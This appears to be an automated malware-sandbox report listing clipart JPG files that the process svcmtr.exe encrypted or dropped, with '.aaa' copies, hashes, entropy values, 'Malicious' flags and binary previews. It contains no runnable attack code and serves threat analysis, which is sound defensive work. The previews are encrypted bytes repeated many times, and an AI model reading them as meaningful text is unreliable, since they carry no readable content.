                                                                                                                          SSDEEP:1536:g3rYD1k6Fuu4xn4AuhBz/FeBQZOqGj0flF9q:+rP6FBOkBzwqZOHjqq
                                                                                                                          MD5:B85FA6A88332DBA57881071E10F6FCFF
                                                                                                                          SHA1:710C1DDA5D915A2A5D9546D3C0F682A117C43017
                                                                                                                          SHA-256:A1FFF3FD441E2CA6CA17FC388DF4D717A18775FD7B83C1D48505311CE1D06B95
                                                                                                                          SHA-512:0AC0768401E7C907FC3B8117C58967267DF2BC0B519B01F963613479D32A3C277A8B4987C8595394C8F89921DF9DEB44855ADAAD28A8D74284A075EBF62177A9
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..a..I,.Pv..).#..~.......4"..4.Z.:=.........Z..{.8v.m......38.?t>.&...i@M.B.g..EI.W{.l.wd3.x4...'w.U.Cg...s.yZ...M-..4%.$.iM[R......N..>.....l..,..e..}l..wDwu....f...#......X...-$....Q..?..,....t..........hX)..Y...8..)...f8b......'87..+.....w.Z.m...S.j..0.M.i.o.3]..{.~'..-...F..O..jS....8......4....0..+#.axY......B.|.....p.."Zu....+=...k..<......5yw.8....w<.Mr|...vA....yN1.7..7...yj..E....Q!..O....|.'.....<....~g:.........?^.wO.....4......(.j.k.!&x3l..:....Q....{..6/.Z....`..rOL...+..:.u#..=.G.[.........k...V/......:a.U...Z.I....m.<......Z.<.N.....1^Fw5...

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02810J.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):51070
                                                                                                                          Entropy (8bit):7.996071574801994
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:g3rYD1k6Fuu4xn4AuhBz/FeBQZOqGj0flF9q:+rP6FBOkBzwqZOHjqq
                                                                                                                          MD5:B85FA6A88332DBA57881071E10F6FCFF
                                                                                                                          SHA1:710C1DDA5D915A2A5D9546D3C0F682A117C43017
                                                                                                                          SHA-256:A1FFF3FD441E2CA6CA17FC388DF4D717A18775FD7B83C1D48505311CE1D06B95
                                                                                                                          SHA-512:0AC0768401E7C907FC3B8117C58967267DF2BC0B519B01F963613479D32A3C277A8B4987C8595394C8F89921DF9DEB44855ADAAD28A8D74284A075EBF62177A9
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..a..I,.Pv..).#..~.......4"..4.Z.:=.........Z..{.8v.m......38.?t>.&...i@M.B.g..EI.W{.l.wd3.x4...'w.U.Cg...s.yZ...M-..4%.$.iM[R......N..>.....l..,..e..}l..wDwu....f...#......X...-$....Q..?..,....t..........hX)..Y...8..)...f8b......'87..+.....w.Z.m...S.j..0.M.i.o.3]..{.~'..-...F..O..jS....8......4....0..+#.axY......B.|.....p.."Zu....+=...k..<......5yw.8....w<.Mr|...vA....yN1.7..7...yj..E....Q!..O....|.'.....<....~g:.........?^.wO.....4......(.j.k.!&x3l..:....Q....{..6/.Z....`..rOL...+..:.u#..=.G.[.........k...V/......:a.U...Z.I....m.<......Z.<.N.....1^Fw5...

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):62942
                                                                                                                          Entropy (8bit):7.996155242321989
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:UVCuJvG/wfcd6wo+p4RaSUdMd3ezqpalnRye1IZUtN8S6/xiOsL:gJvGTQ1+bSUGyNnwe14Uz8SsiBL
                                                                                                                          MD5:C4185DB2B7A74FCEDD0EED8365EFBB24
                                                                                                                          SHA1:02F035A8A373DF0EEA1C566C6BF95CDEDD48C130
                                                                                                                          SHA-256:8E803D0DCBDECB4C9F932084851F7A1943CF2CBD3ED65F34D71819CEA9A7D11D
                                                                                                                          SHA-512:6362F60B3AEE1A603C4B826E0987B8888BE8D3C64890FF2BF45FFDCFBBBD59E29BB8EDD28F04801FBD8768BF39BF072DF4C228DEE38115380A32CFA5679E2A7B
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...E.4 B..H......I8....C$9.-......2~!.+.O.8Il.Jy.#.."..b...0..............?.#o..y].!..M+..c8s.k.n.....j..2...\.f/....[F0 H.^.......v...!.8=...:m......7.A......Z..1.b......$~kuw.t%..3&.~qHQE.T....A.J..=...x..,.|.......g..,...K...av.........[.N"..~...k...q.e/..P.?....q..=.c...x.a....:.MT.n.w.&..w.P&...R.r......._d[)..$3...u.`....o.'.....,.gvUZ (....Mu..F..zP..6......Y..b..%..?.r]x@...x..t.....*-..z...P..K.|x6..#.r..,TFr..l..5p.p...}...u_#......;j..xI.'.....M.....L....}..,n.*zM.........+..S~..q..ax.&.<b.>jW;`.r..g.....u....T'.=..../+:3b.B..($7/.7V........$....&..J.2..._.....

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):62942
                                                                                                                          Entropy (8bit):7.996155242321989
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:UVCuJvG/wfcd6wo+p4RaSUdMd3ezqpalnRye1IZUtN8S6/xiOsL:gJvGTQ1+bSUGyNnwe14Uz8SsiBL
                                                                                                                          MD5:C4185DB2B7A74FCEDD0EED8365EFBB24
                                                                                                                          SHA1:02F035A8A373DF0EEA1C566C6BF95CDEDD48C130
                                                                                                                          SHA-256:8E803D0DCBDECB4C9F932084851F7A1943CF2CBD3ED65F34D71819CEA9A7D11D
                                                                                                                          SHA-512:6362F60B3AEE1A603C4B826E0987B8888BE8D3C64890FF2BF45FFDCFBBBD59E29BB8EDD28F04801FBD8768BF39BF072DF4C228DEE38115380A32CFA5679E2A7B
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...E.4 B..H......I8....C$9.-......2~!.+.O.8Il.Jy.#.."..b...0..............?.#o..y].!..M+..c8s.k.n.....j..2...\.f/....[F0 H.^.......v...!.8=...:m......7.A......Z..1.b......$~kuw.t%..3&.~qHQE.T....A.J..=...x..,.|.......g..,...K...av.........[.N"..~...k...q.e/..P.?....q..=.c...x.a....:.MT.n.w.&..w.P&...R.r......._d[)..$3...u.`....o.'.....,.gvUZ (....Mu..F..zP..6......Y..b..%..?.r]x@...x..t.....*-..z...P..K.|x6..#.r..,TFr..l..5p.p...}...u_#......;j..xI.'.....M.....L....}..,n.*zM.........+..S~..q..ax.&.<b.>jW;`.r..g.....u....T'.=..../+:3b.B..($7/.7V........$....&..J.2..._.....

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):15854
                                                                                                                          Entropy (8bit):7.985243727925691
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GKI2KFAvckduUVeQamR03aoPQIraaUs94iWI4ESeM1:GKj5duc95mao0T
                                                                                                                          MD5:4C4BB99718C34179F774B3D018061AC1
                                                                                                                          SHA1:A3B6937255DAF5F245F49FE46AF6CD393639F164
                                                                                                                          SHA-256:FAE1C01AF495BAF39BC8A39D361AF32BE63B3E5890369AAFB495D0E2AEE0E9B5
                                                                                                                          SHA-512:A7373B5D430958422808762DF02EF473B11C1B0AA8E5762850C3E156C73973C52416029722B5B383C76615201B9A8C500B88DDEADAD9AD1212E611D97E74EF3C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.........B...fM..E<......(ni.x....\%,......F.xq.......*..F.b.s.....\B..<....i..=......z...........C]..I.|O.[..0......xKv...3..)Z..5...8.iD.x...q......'..........N3.....9K..k....c^%....Ux.-.....E...P....(.ct}.?-N!..6....FQ<...,.pK...)b.w..da.W.F..9.gr.>B..-.o.......:.hvC..R.B.Y..dJ.-.H....pll*).j..o.}.S....J..(....NjtY....r.DC....?./.k].8..H(....@../+`...@.\.0..9:.Z.2%%=..v=.........M..\.z..2@.."..........r.......#d]....u..6....q.k....z./..M;...Bz..^g`^a^..... .lZR.t..+{.GG........m..'m.......Y....s........P.?p..w].....&.......Md.?bg...I.m..,X...h.V).9.gJ:.aZ..9.S.1\.l.k..R...om\'X

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):15854
                                                                                                                          Entropy (8bit):7.985243727925691
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:GKI2KFAvckduUVeQamR03aoPQIraaUs94iWI4ESeM1:GKj5duc95mao0T
                                                                                                                          MD5:4C4BB99718C34179F774B3D018061AC1
                                                                                                                          SHA1:A3B6937255DAF5F245F49FE46AF6CD393639F164
                                                                                                                          SHA-256:FAE1C01AF495BAF39BC8A39D361AF32BE63B3E5890369AAFB495D0E2AEE0E9B5
                                                                                                                          SHA-512:A7373B5D430958422808762DF02EF473B11C1B0AA8E5762850C3E156C73973C52416029722B5B383C76615201B9A8C500B88DDEADAD9AD1212E611D97E74EF3C
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.........B...fM..E<......(ni.x....\%,......F.xq.......*..F.b.s.....\B..<....i..=......z...........C]..I.|O.[..0......xKv...3..)Z..5...8.iD.x...q......'..........N3.....9K..k....c^%....Ux.-.....E...P....(.ct}.?-N!..6....FQ<...,.pK...)b.w..da.W.F..9.gr.>B..-.o.......:.hvC..R.B.Y..dJ.-.H....pll*).j..o.}.S....J..(....NjtY....r.DC....?./.k].8..H(....@../+`...@.\.0..9:.Z.2%%=..v=.........M..\.z..2@.."..........r.......#d]....u..6....q.k....z./..M;...Bz..^g`^a^..... .lZR.t..+{.GG........m..'m.......Y....s........P.?p..w].....&.......Md.?bg...I.m..,X...h.V).9.gJ:.aZ..9.S.1\.l.k..R...om\'X

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):31310
                                                                                                                          Entropy (8bit):7.993356148511954
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GyppzY6myIulwMwuB0nw8n03iMYXOLDXPhMfIWB50rzO/R6nV5AFIF:pPyyFwMwuZ2X+XZQf0ry/R6sK
                                                                                                                          MD5:565DB92BAE17399C6E430AC832143430
                                                                                                                          SHA1:D7AFEE4E26AC736AA0DEB370B6DC6C6BBE8C0E91
                                                                                                                          SHA-256:14D1C1530E8C96571533590A1441EF039994D69818E28D64A35425F7ECA2612C
                                                                                                                          SHA-512:38503DC1206C889D894615466139E7690CEBD82A7229041ABDB08F227AA0878FC8B817F78C641A25B173A167B30CE859D107823E4E90349E882FAFD10BF8A301
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....U.R$.#.n]...'0.x....b..Q.3a46...C..<..?R...zr..4.$.x..eY.7..6.1p<.._..P........{QDf.DjD.[.NJ..T.>.-`|...JJ<........$...2........sQ>|.<. .b(../q.".U..O..j....m..1,|...2.R....W;V;..:.OA... ....vG,....e....$.B.3....U....>..oxz..kl.:.q....[........Z.b.+.?.nzA.n.+..}.O.....gZ....LiqA....w....'.+1h74..Ou.....&C<O|..*).#.*.....q.U@..C.B.w.zJ.K...eC.t.*?G.DW.+Y._....&..........s.lP.T....v9...0*..+.)d.....U.r.J.bY...NH...0..A.......~xr..N....6xT0?.D..?....P..$.,a<uL.b...v...T..i.A....]~....=.e......v...M..O....Q.......y...R.........CT.........H...`.w.-..S.+..a.....*.)U[}MG..q...c..

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03041I.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):31310
                                                                                                                          Entropy (8bit):7.993356148511954
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GyppzY6myIulwMwuB0nw8n03iMYXOLDXPhMfIWB50rzO/R6nV5AFIF:pPyyFwMwuZ2X+XZQf0ry/R6sK
                                                                                                                          MD5:565DB92BAE17399C6E430AC832143430
                                                                                                                          SHA1:D7AFEE4E26AC736AA0DEB370B6DC6C6BBE8C0E91
                                                                                                                          SHA-256:14D1C1530E8C96571533590A1441EF039994D69818E28D64A35425F7ECA2612C
                                                                                                                          SHA-512:38503DC1206C889D894615466139E7690CEBD82A7229041ABDB08F227AA0878FC8B817F78C641A25B173A167B30CE859D107823E4E90349E882FAFD10BF8A301
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....U.R$.#.n]...'0.x....b..Q.3a46...C..<..?R...zr..4.$.x..eY.7..6.1p<.._..P........{QDf.DjD.[.NJ..T.>.-`|...JJ<........$...2........sQ>|.<. .b(../q.".U..O..j....m..1,|...2.R....W;V;..:.OA... ....vG,....e....$.B.3....U....>..oxz..kl.:.q....[........Z.b.+.?.nzA.n.+..}.O.....gZ....LiqA....w....'.+1h74..Ou.....&C<O|..*).#.*.....q.U@..C.B.w.zJ.K...eC.t.*?G.DW.+Y._....&..........s.lP.T....v9...0*..+.)d.....U.r.J.bY...NH...0..A.......~xr..N....6xT0?.D..?....P..$.,a<uL.b...v...T..i.A....]~....=.e......v...M..O....Q.......y...R.........CT.........H...`.w.-..S.+..a.....*.)U[}MG..q...c..

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):30206
                                                                                                                          Entropy (8bit):7.993040924253736
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GRW6WEljEiF8oGD23nLH9IeImzHufif8y7i+:yW9MdGDOnLH9VImzHuZ+
                                                                                                                          MD5:E5C457C67C88BB92AF8C2D3FF86D33B5
                                                                                                                          SHA1:62BF0D2799F4D41A9C6D5790C0E7FBD43FE854BA
                                                                                                                          SHA-256:3812458BD7042D86E80249FBF993A18338FDA24C544A30FD020022D27D91D6D9
                                                                                                                          SHA-512:268216D7338F7F43342FD1729E246D6740BDBEBB5DD56FF73F12463AEF264CF387E4CE41A5A6D692EF5A27D56962E07F8C19FAA66EEB2352BE37C5C24BE42CF7
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....;.>.c..C....sPt..8......,.K..~.q.......~h.a*..y/.{.e......E......N.i....f..(5..Jh..G..._*n..1.h..c..8...=...XG..}......\W.Pw.x.....6.;..|...:.]..........1...8Y..1<.9.+...t../.....&..D....'.V9.=y...p.!wi.B.+.0..i.....q..:h.xV...!7<......`......y.......2.5(...#_..X.yJ...N.1..<...qV..0~M]v....3...g.56..s...~...)WE/|&.2.$........=.;&..Z]........F....a.)...)+0.oI..z..j.q!....r..x.9..6..Vm..3..k.b..`.......\1w..Y......?.....l!k.....t.h.vI...T[..V.W..9F2r......`r..i6*.j.{....A.o..x...1f..U.p...i...-T..\,mN|F"...2....4.....$..r.X.=w.j..~YCv...w..iz.4..M./..{...@n....(.w^.i....E9PB

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03143I.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):30206
                                                                                                                          Entropy (8bit):7.993040924253736
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GRW6WEljEiF8oGD23nLH9IeImzHufif8y7i+:yW9MdGDOnLH9VImzHuZ+
                                                                                                                          MD5:E5C457C67C88BB92AF8C2D3FF86D33B5
                                                                                                                          SHA1:62BF0D2799F4D41A9C6D5790C0E7FBD43FE854BA
                                                                                                                          SHA-256:3812458BD7042D86E80249FBF993A18338FDA24C544A30FD020022D27D91D6D9
                                                                                                                          SHA-512:268216D7338F7F43342FD1729E246D6740BDBEBB5DD56FF73F12463AEF264CF387E4CE41A5A6D692EF5A27D56962E07F8C19FAA66EEB2352BE37C5C24BE42CF7
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....;.>.c..C....sPt..8......,.K..~.q.......~h.a*..y/.{.e......E......N.i....f..(5..Jh..G..._*n..1.h..c..8...=...XG..}......\W.Pw.x.....6.;..|...:.]..........1...8Y..1<.9.+...t../.....&..D....'.V9.=y...p.!wi.B.+.0..i.....q..:h.xV...!7<......`......y.......2.5(...#_..X.yJ...N.1..<...qV..0~M]v....3...g.56..s...~...)WE/|&.2.$........=.;&..Z]........F....a.)...)+0.oI..z..j.q!....r..x.9..6..Vm..3..k.b..`.......\1w..Y......?.....l!k.....t.h.vI...T[..V.W..9F2r......`r..i6*.j.{....A.o..x...1f..U.p...i...-T..\,mN|F"...2....4.....$..r.X.=w.j..~YCv...w..iz.4..M./..{...@n....(.w^.i....E9PB

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42222
                                                                                                                          Entropy (8bit):7.995847055140499
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:G2zUf2yDvM9rd0Vd4UgEHZI7RaLfaZJr7f00K+9g40TjSTqwhzHJs7Ujpz56kfC+:fUf2jpdad4U7ZI7ReaDrDi+z0n3whzHl
                                                                                                                          MD5:78667ECC8B3D4C00AD23679F5B011DAE
                                                                                                                          SHA1:EC9A15A033104B68B5EDCAD5B4EE063790007416
                                                                                                                          SHA-256:3EE7DE5F603E0FED549E5099CB09B8DF7256A6F38DC85956A659B0894C5183B2
                                                                                                                          SHA-512:0DADBCD3E573AB5D7673631CBA8775FB2BED563A2ABFD918D374C4347577FFDCB5A97B13499A7D7F9A51FE5FDA2AAE5A1FFA59EB918CB466F10CD7A8924A539A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...L......s..)..!C....U....1.vLT...g+.... .a..QHz...(#..t.x.).. ....V....,.<.....,....eQ.[.g.+...n.?..^.u.;.O.....M.^...)......c.5M...h4..P...l..As....V@.W...2.H...N>...WP!.##......._.@..c.....Y.h......j.....R....X...d..m....=..G.1....e.\U......N..o...wz..f..Xr.Y.....9..0;2..`......yH.?d...h..tvo..'OS...Y.O.n..K..{3......r..J..Zd."...........a........g.{..^.wdV..Hc....ai.$.w.AP..Xo.......m.K.$;...p{.uN.......M.+.l.J....8k....b...b....9.:....4C/.{..".u:.O....Y...Ba.-.%.l....[m...Pt...{.8.:...".Xq.2..(.jJNT.....a.R.${HW=..g..w....r.1..=$t.......O.mLV..`.Gl'Q4=8.e...{..

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03205I.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42222
                                                                                                                          Entropy (8bit):7.995847055140499
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:G2zUf2yDvM9rd0Vd4UgEHZI7RaLfaZJr7f00K+9g40TjSTqwhzHJs7Ujpz56kfC+:fUf2jpdad4U7ZI7ReaDrDi+z0n3whzHl
                                                                                                                          MD5:78667ECC8B3D4C00AD23679F5B011DAE
                                                                                                                          SHA1:EC9A15A033104B68B5EDCAD5B4EE063790007416
                                                                                                                          SHA-256:3EE7DE5F603E0FED549E5099CB09B8DF7256A6F38DC85956A659B0894C5183B2
                                                                                                                          SHA-512:0DADBCD3E573AB5D7673631CBA8775FB2BED563A2ABFD918D374C4347577FFDCB5A97B13499A7D7F9A51FE5FDA2AAE5A1FFA59EB918CB466F10CD7A8924A539A
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264...L......s..)..!C....U....1.vLT...g+.... .a..QHz...(#..t.x.).. ....V....,.<.....,....eQ.[.g.+...n.?..^.u.;.O.....M.^...)......c.5M...h4..P...l..As....V@.W...2.H...N>...WP!.##......._.@..c.....Y.h......j.....R....X...d..m....=..G.1....e.\U......N..o...wz..f..Xr.Y.....9..0;2..`......yH.?d...h..tvo..'OS...Y.O.n..K..{3......r..J..Zd."...........a........g.{..^.wdV..Hc....ai.$.w.AP..Xo.......m.K.$;...p{.uN.......M.+.l.J....8k....b...b....9.:....4C/.{..".u:.O....Y...Ba.-.%.l....[m...Pt...{.8.:...".Xq.2..(.jJNT.....a.R.${HW=..g..w....r.1..=$t.......O.mLV..`.Gl'Q4=8.e...{..

                                                                                                                          C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42478
                                                                                                                          Entropy (8bit):7.995839147716423
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:GS3TTgqjmW+fTKokEWzdqpkFKeM56jIgqxHNGSW3e7+ElT3RVdb7JwR:B3fHmvrH3sq2swMb+9e+ElTB/FO
                                                                                                                          MD5:FBA4261E90510B5D3B48FF2997477F60
                                                                                                                          SHA1:AECB9F4F864F0E2F07DBFE78206317D3842EF3B7
                                                                                                                          SHA-256:7167EA340484A0E011BB2AB27FA4B19D4BAEC9583D861D6B64D4C115359B2DB1
                                                                                                                          SHA-512:F9D6F79C10FFCB29BE7CDDDD7337A240884B4036D6FF05AC1CB1B7E6813371BE31E4DDAF4B192AA648F330627D7EFEB5A911DD88DBF3E14AE637CC15F6DFC059
                                                                                                                          Malicious:true
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264........t...\w....E....-........:..Q.@...Vlb.../..........v.d.S.X..QYF...g...]*^.#vF........0.{.y*.b!i{N.k}ts4.....j..N..8.D.....q+.....[...sSk.c...;..^...=.....m'l.O.v`............_P|.t6&.a..>...B.#.4.~}..8/...{.....t.5as..VAp~{.DLx.whl..W......c..c.$c"..idX.]!....z.A{...x.....u......v...t.&e.1g.p.A.....> P.{...`.{t.z..m.)*.u..3ry.....ip.......{.%w..I....2.........C.'#..5h......,..u_.C........ ..qaV.]1h,.D.mQi.I.8..M_h.7_ S=..,K..0..0..{.a..........&.yr..D...?...}.O>.6....y.s...=e..).Xl.....h...,.$8'......@$.Q......@g#.0.....I.Lvida..E.K.m...`.M.U.O...-Z]..]HM....y

